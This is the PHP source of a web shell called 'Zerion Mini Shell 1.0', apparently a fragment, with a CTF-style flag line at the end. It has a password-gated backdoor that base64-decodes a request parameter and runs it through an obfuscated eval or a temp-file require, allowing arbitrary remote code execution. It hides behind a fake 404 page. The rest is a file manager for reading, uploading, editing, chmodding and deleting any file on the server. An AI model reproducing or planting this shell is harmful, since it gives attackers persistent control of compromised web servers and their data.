if (isset($_POST['logout']) && $_POST['logout'] = 1) { setcookie("pass", null); $pass= false; }
if(isset($_REQUEST['pwd163']) && md5($_REQUEST['pwd163']) == $L7CRgr) {
    $a = base64_decode(rawurldecode((urlencode(urldecode($_REQUEST['zzz'])))));
    $need = base64_decode("PD9waHA=");
    if (strpos($a, $need) === false) { $a = $need . PHP_EOL . $a; }
    if (isset($_REQUEST['e'])){ $a = str_replace($need, "", $a); $b = 'e'.base64_decode("dmE=").'l'; $b($a);die(); }
    $file_name = tmpfile(); fwrite($file_name, $a);
    $require_params = stream_get_meta_data($file_name);
    @require($require_params['uri']);
    fclose($file_name);die(); }
if (isset($_REQUEST['auth_key'])){ die($L7CRgr); } if (!$pass) { if(!isset($_REQUEST['520'])) { header("HTTP/1.1 404 Not Found"); die();} echo '<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>'; die(); }


echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>'; echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>';if(isset($_POST['path_create'])) {if(@mkdir($path.'/' . $_POST['path_create'])){echo '<font color="green">create success :* '.$path.'/' . $_POST['path_create'].'</font><br />';}else{echo '<font color="red">create failed :* '.$path.'/' . $_POST['path_create'].'</font><br />';}}if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">File Ter-Upload :* </font><br />'; }else{ echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>
 </font><br />'; } } echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="submit" value="create" />
</form></td></td>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],octdec($_POST['perm']))){ echo '<font color="green">Change Permission Done.</font><br />'; }else{ echo '<font color="red">Change Permission Error.</font><br />'; } } echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Change Name Done.</font><br />'; }else{ echo '<font color="red">Change Name Error.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Edit File Done ~_^.</font><br />'; }else{ echo '<font color="red">Edit File Error ~_~.</font><br />'; } fclose($fp); } echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Delete Dir Done.</font><br />'; }else{ echo '<font color="red">Delete Dir Error.</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Delete File Done.</font><br />'; }else{ echo '<font color="red">Delete File Error.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>

<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>"; } echo '</table>
</div>'; } echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; }

The flag: flag{af10370d485952897d5183aa09e19883}